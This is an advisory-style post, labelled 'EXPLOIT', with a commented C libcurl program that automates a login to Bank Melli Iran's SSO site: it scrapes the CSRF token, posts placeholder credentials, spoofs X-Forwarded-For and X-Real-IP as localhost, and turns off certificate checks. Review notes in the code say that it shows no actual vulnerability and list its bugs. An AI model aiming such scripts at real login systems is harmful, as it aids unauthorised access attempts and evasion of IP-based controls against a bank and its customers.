C-Based Automated Login Analyzer with CSRF Token Extraction for SSO bmi.ir Systems

2025.07.11
E1.Coders (IR)
Risk: Low
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

This C-based proof-of-concept automates login to CSRF-protected SSO systems by mimicking browser headers, handling cookies, and extracting anti-forgery tokens using regex. It performs a full session simulation via libcurl, including GET, POST, and authentication state management. Intended for security research and penetration testing of SSO implementations. EXPLOIT :
/*
 *******************************************************************************
 * CODE BY E1.CODERS
 *
 * 🎯 Target: bmi.ir – Bank Melli Iran official website. The website provides
 * public access to banking news, services, customer support, online banking
 * portals, and secure authentication systems such as SSO (Single Sign-On) for
 * integrated access across BMI's digital services. The domain hosts several
 * subdomains and services. The SSO platform (sso.bmi.ir) uses anti-CSRF
 * tokens, session cookies, and standard security headers. It also implements
 * CAPTCHA and JavaScript-based challenges to prevent automated access.
 *
 * NOTE(review): the listing below is a scripted GET / POST / GET sequence with
 * placeholder credentials. Nothing in it addresses the CAPTCHA or JavaScript
 * challenges mentioned above, and the visible code demonstrates no
 * vulnerability in the target (the advisory itself lists CVE and CWE as N/A).
 ********************************************************************************
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include <regex.h>

/* Capacity of the single static buffer that holds the most recent response. */
#define MAX_BUF 1000000

/* File-scope response accumulator shared by the write callback and main(). */
char response_buffer[MAX_BUF];
size_t response_offset = 0;

/*
 * libcurl write callback: appends one received chunk to response_buffer.
 *
 * contents/size/nmemb describe the chunk; userp is unused.
 * Returns size * nmemb in every case.
 *
 * A chunk that would not fit (leaving room for the terminating NUL) is
 * dropped without any signal: the function still reports the full chunk as
 * consumed, so the transfer continues and the stored body is incomplete.
 * NOTE(review): size * nmemb and response_offset + total are not checked for
 * overflow.
 */
size_t write_callback(void *contents, size_t size, size_t nmemb, void *userp) {
    size_t total = size * nmemb;
    if (response_offset + total < MAX_BUF) {
        memcpy(response_buffer + response_offset, contents, total);
        response_offset += total;
        /* Keep the buffer NUL-terminated so it can be passed to regexec(). */
        response_buffer[response_offset] = '\0';
    }
    return total;
}

/*
 * Runs a POSIX regex (compiled with REG_EXTENDED) over html, looking for the
 * __RequestVerificationToken hidden-field markup, and returns a heap copy of
 * the byte range recorded in matches[1].
 *
 * Returns NULL when the pattern fails to compile or does not match.
 * The caller owns the returned string and must free() it.
 *
 * NOTE(review): the malloc() result is used without a NULL check, and the
 * regoff_t offsets are narrowed to int without validating that they are
 * non-negative.
 */
char *extract_token(const char *html) {
    regex_t regex;
    regmatch_t matches[2];
    const char *pattern = "__RequestVerificationToken\" type=\"hidden\" value=\"\\([^\"]*\\)\"";
    if (regcomp(&regex, pattern, REG_EXTENDED) != 0) return NULL;
    if (regexec(&regex, html, 2, matches, 0) != 0) {
        regfree(&regex);
        return NULL;
    }
    int start = matches[1].rm_so;
    int end = matches[1].rm_eo;
    int len = end - start;
    char *token = malloc(len + 1);
    /* strncpy does not terminate here; the NUL is written explicitly below. */
    strncpy(token, html + start, len);
    token[len] = '\0';
    regfree(&regex);
    return token;
}

/*
 * Issues three requests on one easy handle: a GET of the SSO landing page,
 * a form POST to /account/login carrying the token taken from that page, and
 * a GET of /user/panel.
 *
 * Returns 1 if the first or second transfer fails or no token is found.
 * Returns 0 otherwise, including when curl_easy_init() fails or the third
 * transfer fails. The bodies of the second and third responses are stored in
 * response_buffer but never read, so the program does not report whether the
 * login was accepted.
 */
int main(void) {
    CURL *curl;
    CURLcode res;
    /* Return value of curl_global_init() is not checked. */
    curl_global_init(CURL_GLOBAL_ALL);
    curl = curl_easy_init();
    if (curl) {
        struct curl_slist *headers = NULL;
        curl_easy_setopt(curl, CURLOPT_URL, "https://sso.bmi.ir/");
        curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback);
        curl_easy_setopt(curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36");
        /*
         * The header list is installed once and therefore sent on all three
         * requests, the GETs included.
         * Defender note: X-Forwarded-For and X-Real-IP are ordinary
         * client-supplied headers. A server or reverse proxy should honour
         * them only when they arrive from a known upstream proxy, and should
         * never use them for rate limiting, allow-listing or audit logging
         * when they come directly from a client.
         */
        headers = curl_slist_append(headers, "X-Forwarded-For: 127.0.0.1");
        headers = curl_slist_append(headers, "X-Real-IP: 127.0.0.1");
        headers = curl_slist_append(headers, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        headers = curl_slist_append(headers, "Accept-Language: en-US,en;q=0.5");
        headers = curl_slist_append(headers, "Connection: keep-alive");
        headers = curl_slist_append(headers, "Referer: https://sso.bmi.ir/");
        headers = curl_slist_append(headers, "Origin: https://sso.bmi.ir/");
        headers = curl_slist_append(headers, "Host: sso.bmi.ir");
        headers = curl_slist_append(headers, "Content-Type: application/x-www-form-urlencoded");
        curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);
        /*
         * Cookies are loaded from and saved to cookies.txt in the working
         * directory, so session cookies end up on disk in plaintext.
         */
        curl_easy_setopt(curl, CURLOPT_COOKIEFILE, "cookies.txt");
        curl_easy_setopt(curl, CURLOPT_COOKIEJAR, "cookies.txt");
        curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
        /*
         * NOTE(review): both certificate checks are switched off. The client
         * will accept any certificate for sso.bmi.ir, so the form body built
         * below (including the password field) is exposed to anyone able to
         * intercept the connection. Test tooling should leave verification on.
         */
        curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
        curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);

        /* Request 1: fetch the landing page into response_buffer. */
        res = curl_easy_perform(curl);
        if (res != CURLE_OK) {
            fprintf(stderr, "%s\n", curl_easy_strerror(res));
            curl_easy_cleanup(curl);
            curl_slist_free_all(headers);
            curl_global_cleanup();
            return 1;
        }
        char *token = extract_token(response_buffer);
        if (!token) {
            fprintf(stderr, "Token not found\n");
            curl_easy_cleanup(curl);
            curl_slist_free_all(headers);
            curl_global_cleanup();
            return 1;
        }
        /*
         * USERNAME and PASSWORD are literal placeholders in the format string.
         * The snprintf() return value is not checked, so a token too long for
         * the 1024-byte buffer is truncated silently.
         */
        char postdata[1024];
        snprintf(postdata, sizeof(postdata), "username=USERNAME&password=PASSWORD&__RequestVerificationToken=%s", token);
        free(token);

        /* Request 2: submit the login form. */
        curl_easy_setopt(curl, CURLOPT_URL, "https://sso.bmi.ir/account/login");
        curl_easy_setopt(curl, CURLOPT_POST, 1L);
        /* postdata stays in scope for the transfer; libcurl is handed the pointer here. */
        curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postdata);
        /* Rewind the write position; the old buffer contents are not cleared. */
        response_offset = 0;
        res = curl_easy_perform(curl);
        if (res != CURLE_OK) {
            fprintf(stderr, "%s\n", curl_easy_strerror(res));
            curl_easy_cleanup(curl);
            curl_slist_free_all(headers);
            curl_global_cleanup();
            return 1;
        }

        /* Request 3: switch back to GET and fetch the post-login page. */
        curl_easy_setopt(curl, CURLOPT_URL, "https://sso.bmi.ir/user/panel");
        curl_easy_setopt(curl, CURLOPT_HTTPGET, 1L);
        response_offset = 0;
        res = curl_easy_perform(curl);
        if (res != CURLE_OK) {
            /* Failure is only logged; the exit status remains 0. */
            fprintf(stderr, "%s\n", curl_easy_strerror(res));
        }
        curl_easy_cleanup(curl);
        curl_slist_free_all(headers);
    }
    curl_global_cleanup();
    return 0;
}

